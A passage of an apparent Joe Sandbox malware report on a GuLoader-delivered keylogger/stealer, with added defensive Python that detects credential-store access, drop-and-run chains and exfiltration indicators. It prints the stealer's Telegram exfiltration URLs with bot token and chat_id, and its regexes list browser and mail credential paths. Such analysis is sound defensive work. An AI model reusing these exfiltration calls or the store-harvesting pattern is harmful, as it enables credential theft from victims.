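# Edge and any other Chromium fork are covered by the same rule.
CREDENTIAL_STORES = {
    "chromium_logins": re.compile(r"\\user data\\[^\\]+\\login data$"),
    "chromium_cookies": re.compile(r"\\user data\\[^\\]+\\(?:network\\)?cookies$"),
    "chromium_webdata": re.compile(r"\\user data\\[^\\]+\\web data$"),
    "chromium_history": re.compile(r"\\user data\\[^\\]+\\(?:history|top sites)$"),
    "postbox_profile": re.compile(r"\\appdata\\roaming\\postboxapp\\profiles\\?$"),
}
# MAPI profile tree Outlook keeps its account settings under (the report shows the
# 9375CFF0413111d3B88A00104B2A6676 subkey being opened).
OUTLOOK_PROFILE_KEY = re.compile(r"\\windows messaging subsystem\\profiles\\")

# Image names allowed to touch each store family; anything else is a hit.
EXPECTED_OWNERS = {
    "chromium_logins": {"chrome.exe", "msedge.exe"},
    "chromium_cookies": {"chrome.exe", "msedge.exe"},
    "chromium_webdata": {"chrome.exe", "msedge.exe"},
    "chromium_history": {"chrome.exe", "msedge.exe"},
    "postbox_profile": {"postbox.exe"},
    "outlook_profile": {"outlook.exe"},
}


@dataclass(frozen=True)
class Event:
    kind: str      # "file" or "registry"
    process: str   # full image path of the accessing process
    target: str    # file path or registry key that was opened


def classify_target(event):
    """Return the store family an access touches, or None if it is uninteresting."""
    target = event.target.lower()
    if event.kind == "registry":
        return "outlook_profile" if OUTLOOK_PROFILE_KEY.search(target) else None
    for label, pattern in CREDENTIAL_STORES.items():
        if pattern.search(target):
            return label
    return None


def detect(events):
    """Return (image name, store family, target) for accesses by unexpected processes."""
    hits = []
    for event in events:
        label = classify_target(event)
        if label is None:
            continue
        owner = ntpath.basename(event.process).lower()
        if owner not in EXPECTED_OWNERS[label]:
            hits.append((owner, label, event.target))
    return hits


def triage(events):
    """Group hits per process: which store families did each one reach into?"""
    families = {}
    for owner, label, _ in detect(events):
        families.setdefault(owner, set()).add(label)
    return {owner: sorted(labels) for owner, labels in families.items()}


def verdict(labels):
    """Browser stores plus a mail profile from one process is the pattern in the report."""
    browser = any(label.startswith("chromium_") for label in labels)
    mail = any(label in ("postbox_profile", "outlook_profile") for label in labels)
    if browser and mail:
        return "high"
    return "medium" if (browser or mail) else "none"


STEALER = r"C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PROFILE = r"C:\Users\user\AppData\Local"
# Constructed events mirroring the report's "File opened" / "Key opened" lines,
# plus two benign accesses that must not fire.
ACCESS_EVENTS = [
    Event("file", STEALER, PROFILE + r"\Google\Chrome\User Data\Default\History"),
    Event("file", STEALER, PROFILE + r"\Microsoft\Edge\User Data\Default\History"),
    Event("file", STEALER, PROFILE + r"\Google\Chrome\User Data\Default\Network\Cookies"),
    Event("file", STEALER, PROFILE + r"\Google\Chrome\User Data\Default\Web Data"),
    Event("file", STEALER, PROFILE + r"\Google\Chrome\User Data\Default\Login Data"),
    Event("file", STEALER, PROFILE + r"\Microsoft\Edge\User Data\Default\Login Data"),
    Event("file", STEALER, PROFILE + r"\Google\Chrome\User Data\Default\Top Sites"),
    Event("file", STEALER, PROFILE + r"\Microsoft\Edge\User Data\Default\Network\Cookies"),
    Event("file", STEALER, r"C:\Users\user\AppData\Roaming\PostboxApp\Profiles" + "\\"),
    Event("registry", STEALER, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    Event("file", STEALER, STEALER),                                                   # reads its own image
    Event("file", CHROME, PROFILE + r"\Google\Chrome\User Data\Default\Login Data"),  # the browser itself
]

if __name__ == "__main__":
    for owner, labels in triage(ACCESS_EVENTS).items():
        print(f"{owner}: {verdict(labels)} -> {', '.join(labels)}")
```

The allow-list is the weak point of this rule in production: browser updaters, backup agents and EDR scanners also open these files, so tune EXPECTED_OWNERS per estate rather than shipping the set above as-is. The verdict deliberately keys on breadth (browser stores and a mail profile from one process), which is what separates the stealer here from a single misbehaving utility.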

Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one line per tactic column, cells in the order the matrix lists them; bracketed figures are the counters the matrix prints in front of a technique, reproduced as shown)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [1]; PowerShell [2]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [311]; Registry Run Keys / Startup Folder [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [41]; Access Token Manipulation [1]; Process Injection [311]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery [2]; System Information Discovery [116]; Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service [1]; Ingress Tool Transfer [3]; Encrypted Channel [21]; Non-Application Layer Protocol [4]; Application Layer Protocol [15]; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1587907; sample fGu8xWoMrg.exe; start date 10/01/2025; architecture WINDOWS; score 100). Bracketed figures after a process are the graph's created-registry-value / created-file counters, reproduced as shown.

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 6 other signatures
Contacted domains: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 4 other IPs or domains

fGu8xWoMrg.exe [1 / 29]
  dropped: C:\Users\user\AppData\...\Afsyringer.Una (Unicode); C:\Users\user\AppData\Local\...\nsExec.dll (PE32)
  signature: Suspicious powershell command line found
  -> powershell.exe [28]
       dropped: C:\Users\user\AppData\...\Mangedoblende.exe (PE32); C:\...\Mangedoblende.exe:Zone.Identifier (ASCII)
       signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
       -> Mangedoblende.exe [15 / 8]
            network: checkip.dyndns.com 132.226.247.73 port 80 (local port 49937; UTMEMUS, United States); api.telegram.org 149.154.167.220 port 443 (local ports 49997, 49998; TELEGRAMRU, United Kingdom); 4 other IPs or domains
            signatures: Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Switches to a custom stack to bypass stack traces
       -> conhost.exe
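The graph is a three-stage drop-and-run chain: a launcher on the Desktop writes an NSIS plugin to Temp and starts powershell.exe, PowerShell writes Mangedoblende.exe plus its Zone.Identifier stream into Temp, and that file is then started as a child of PowerShell. The lineage itself is detectable from ordinary process-create and file-create telemetry, before any injection or network signature fires. The following is an added example, not code from the report or from Joe Sandbox: it rebuilds the process tree from a constructed event stream that mirrors the graph and flags any process whose image was written by a script-host ancestor into a user-writable path. The event field names, the script-host list and the user-writable path markers are this example's own assumptions.

```python
"""Correlate the drop-and-run chain from the behaviour graph out of process and file events.

Added example, not part of the Joe Sandbox report. CHAIN_EVENTS is a constructed
stream that mirrors the graph (launcher on the Desktop -> powershell.exe ->
Mangedoblende.exe written to Temp and then started); the field names are this
example's own and follow no vendor's event schema.
"""
import ntpath
from dataclasses import dataclass, field

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Path fragments that mean "a normal user could have written this file".
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


@dataclass
class Proc:
    pid: int
    image: str
    parent: int
    writes: list = field(default_factory=list)   # files this process created


def image_name(path):
    return ntpath.basename(path).lower()


def user_writable(path):
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE)


def build_tree(events):
    """Fold process-create and file-create events into a pid -> Proc map."""
    procs = {}
    for ev in events:
        if ev["type"] == "process":
            procs[ev["pid"]] = Proc(ev["pid"], ev["image"], ev["parent"])
        elif ev["type"] == "file" and ev["pid"] in procs:
            procs[ev["pid"]].writes.append(ev["path"])
    return procs


def ancestry(procs, pid):
    """Proc objects from pid up to the root, nearest first; tolerant of pid-reuse loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].parent
    return chain


def find_drop_and_run(events):
    """Flag a process whose image was written by a script-host ancestor into a user-writable path."""
    procs = build_tree(events)
    hits = []
    for proc in procs.values():
        if not user_writable(proc.image):
            continue
        lineage = ancestry(procs, proc.pid)
        for writer in lineage[1:]:                      # ancestors only, nearest first
            if image_name(writer.image) not in SCRIPT_HOSTS:
                continue
            if not any(w.lower() == proc.image.lower() for w in writer.writes):
                continue
            # A Zone.Identifier stream written beside the payload usually means it was
            # downloaded rather than carved out of the launcher.
            motw = any(w.lower() == proc.image.lower() + ":zone.identifier" for w in writer.writes)
            launcher = procs.get(writer.parent)
            hits.append({
                "image": proc.image,
                "dropped_by": image_name(writer.image),
                "chain": " -> ".join(ntpath.basename(p.image) for p in reversed(lineage)),
                "mark_of_the_web": motw,
                "launcher_in_user_path": bool(launcher and user_writable(launcher.image)),
            })
            break
    return hits


TEMP = r"C:\Users\user\AppData\Local\Temp"
CHAIN_EVENTS = [  # constructed to mirror the behaviour graph above
    {"type": "process", "pid": 1, "parent": 0, "image": r"C:\Users\user\Desktop\fGu8xWoMrg.exe"},
    {"type": "file", "pid": 1, "path": TEMP + r"\nsc9301.tmp\nsExec.dll"},
    {"type": "process", "pid": 2, "parent": 1,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "file", "pid": 2, "path": TEMP + r"\Mangedoblende.exe"},
    {"type": "file", "pid": 2, "path": TEMP + r"\Mangedoblende.exe:Zone.Identifier"},
    {"type": "process", "pid": 3, "parent": 2, "image": TEMP + r"\Mangedoblende.exe"},
    {"type": "process", "pid": 4, "parent": 2, "image": r"C:\Windows\System32\conhost.exe"},
]

if __name__ == "__main__":
    for hit in find_drop_and_run(CHAIN_EVENTS):
        print(hit)
```

Two things the rule intentionally does not try to model: the Early Bird APC injection PowerShell performs into the child (that is a memory-level signal, not a lineage one) and the NSIS plugin write by the launcher, which on its own is normal installer behaviour. Both launcher-in-user-path and mark-of-the-web are reported as separate booleans so an analyst can weight them rather than have the rule decide.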

Antivirus detection (submitted file)
Source | Detection | Scanner | Label
fGu8xWoMrg.exe | 76% | Virustotal |
fGu8xWoMrg.exe | 63% | ReversingLabs | Win32.Ransomware.GuLoader

Antivirus detection (dropped files)
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | 63% | ReversingLabs | Win32.Ransomware.GuLoader
C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | 76% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll | 0% | Virustotal |

No Antivirus matches (the report's remaining three scan tables are empty)
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.185.174 | true | false | | high
drive.usercontent.google.com | 216.58.212.161 | true | false | | high
reallyfreegeoip.org | 104.21.96.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | | high
https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
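The URLs above are the complete recon-and-exfiltration sequence of the payload: an external-IP lookup against checkip.dyndns.org, a country lookup of that IP against reallyfreegeoip.org, and Telegram Bot API calls that carry the bot token, the operator's chat_id and the victim fields in the query string. Because the token sits in the URL, every proxy log or memory string that captured these requests also captured the operator's credential. The following is an added example, not code from the report or from Joe Sandbox: it parses the five URLs exactly as the table shows them, classifies each, decodes the caption/text body into key/value fields and rolls the result up into an indicator set. The classification labels, the record layout, the assumed shape of a Telegram bot token and the key/value splitting are this example's own design; it does not contact any host.

```python
"""Parse the recon and exfiltration URLs a Snake/VIP Keylogger-style sample leaves behind.

Added example, not part of the Joe Sandbox report. SAMPLE_URLS are copied from the
URL table above; the classification labels, the record layout, the assumed shape
of a Telegram bot token and the key/value splitting of the message body are this
example's own design. Nothing here contacts the hosts.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API path: /bot<token>/<method>. Strings carved from memory may have
# an empty token (the sendMessage URL in the report), so the token is optional.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")
# Assumed token shape: "<numeric bot id>:<secret>"; used only to say whether the
# captured URL carries a complete credential.
BOT_TOKEN_SHAPE = re.compile(r"^\d{6,12}:[A-Za-z0-9_-]{30,}$")
EXTERNAL_IP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
GEOIP_PATH = re.compile(r"^/(?:xml|json|csv)/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_fields(message):
    """Turn the 'Key: value' lines of a beacon body into a dict (first colon splits)."""
    fields = {}
    for line in message.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key.strip():
            fields[key.strip()] = value.strip()
    return fields


def parse_url(url):
    """Classify one URL and pull out the indicators a responder needs from it."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    record = {"url": url, "host": host, "kind": "other"}
    if host == "api.telegram.org":
        match = TELEGRAM_BOT_PATH.match(parts.path)
        if match:
            query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
            token = match.group("token")
            body = (query.get("caption") or query.get("text") or [""])[0]
            record.update(
                kind="telegram-bot-api",
                method=match.group("method"),
                bot_id=token.split(":", 1)[0],
                token_complete=bool(BOT_TOKEN_SHAPE.match(token)),
                chat_id=query.get("chat_id", [""])[0],
                fields=parse_fields(body),
            )
    elif host in EXTERNAL_IP_HOSTS:
        record["kind"] = "external-ip-lookup"
    elif host in GEOIP_HOSTS:
        match = GEOIP_PATH.match(parts.path)
        record["kind"] = "geoip-lookup"
        record["looked_up_ip"] = match.group("ip") if match else ""
    return record


def extract_iocs(urls):
    """Roll the per-URL records up into the indicator set a report would list."""
    iocs = {"hosts": set(), "bot_ids": set(), "chat_ids": set(),
            "victim_ip": "", "victim_fields": {}}
    for record in map(parse_url, urls):
        iocs["hosts"].add(record["host"])
        if record["kind"] == "telegram-bot-api":
            if record["bot_id"]:
                iocs["bot_ids"].add(record["bot_id"])
            if record["chat_id"]:
                iocs["chat_ids"].add(record["chat_id"])
            iocs["victim_fields"].update(record["fields"])
        elif record["kind"] == "geoip-lookup" and record["looked_up_ip"]:
            iocs["victim_ip"] = record["looked_up_ip"]
    return iocs


SAMPLE_URLS = [  # copied from the report's URL table, in the order shown there
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument"
    "?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C"
    "%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery",
    "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument"
    "?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C"
    "%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery",
    "http://checkip.dyndns.org/",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108"
    "%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States"
    "%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's"
    "%20mean%20the%20system%20storage's%20empty.%20%5D",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(parse_url(url))
    print(extract_iocs(SAMPLE_URLS))
```

The sendMessage string is worth noting: its token and chat_id are blank because it was carved from memory as a format template rather than a sent request, which is why token_complete is reported separately from the bot_id. On a real case the hosts set (api.telegram.org, checkip.dyndns.org, reallyfreegeoip.org) is too generic to block on its own; the bot_id and chat_id are the indicators that tie traffic to this operator.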
                                  NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.185.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
216.58.212.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587907
Start date and time: 2025-01-10 19:15:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fGu8xWoMrg.exe (renamed because the original name is a hash value)
Original Sample Name: 2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/16@6/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 202
• Number of non-executed functions: 106
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1864 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:16:40 | API Interceptor | 37x Sleep call for process: powershell.exe modified
13:17:31 | API Interceptor | 8084x Sleep call for process: Mangedoblende.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | eLo1khn7DQ.exe | malicious | MassLogger RAT |
149.154.167.220 | MzqLQjCwrw.exe | malicious | MassLogger RAT |
149.154.167.220 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | IUqsn1SBGy.exe | malicious | AgentTesla |
149.154.167.220 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.96.1 | zE1VxVoZ3W.exe | malicious | FormBook | www.aonline.top/fqlg/
104.21.96.1 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
104.21.96.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/
193.122.6.168 | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | SBkuP3ACSA.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ql8KpEHT7y.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 8kDIr4ZdNj.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 4iDzhJBJVv.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                                                                                                                                      ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
reallyfreegeoip.org | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
reallyfreegeoip.org | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
reallyfreegeoip.org | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | SBkuP3ACSA.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | v3tK92KcJV.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.80.1
checkip.dyndns.com | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | eLo1khn7DQ.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | MzqLQjCwrw.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | SBkuP3ACSA.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | v3tK92KcJV.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
api.telegram.org | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | eLo1khn7DQ.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | MzqLQjCwrw.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | IUqsn1SBGy.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | MzqLQjCwrw.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | SBkuP3ACSA.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | zAK7HHniGW.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | ql8KpEHT7y.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | 8kDIr4ZdNj.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | 2V7usxd7Vc.exe | malicious | MassLogger RAT | 158.101.44.242
TELEGRAMRU | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
TELEGRAMRU | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | eLo1khn7DQ.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | MzqLQjCwrw.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | IUqsn1SBGy.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
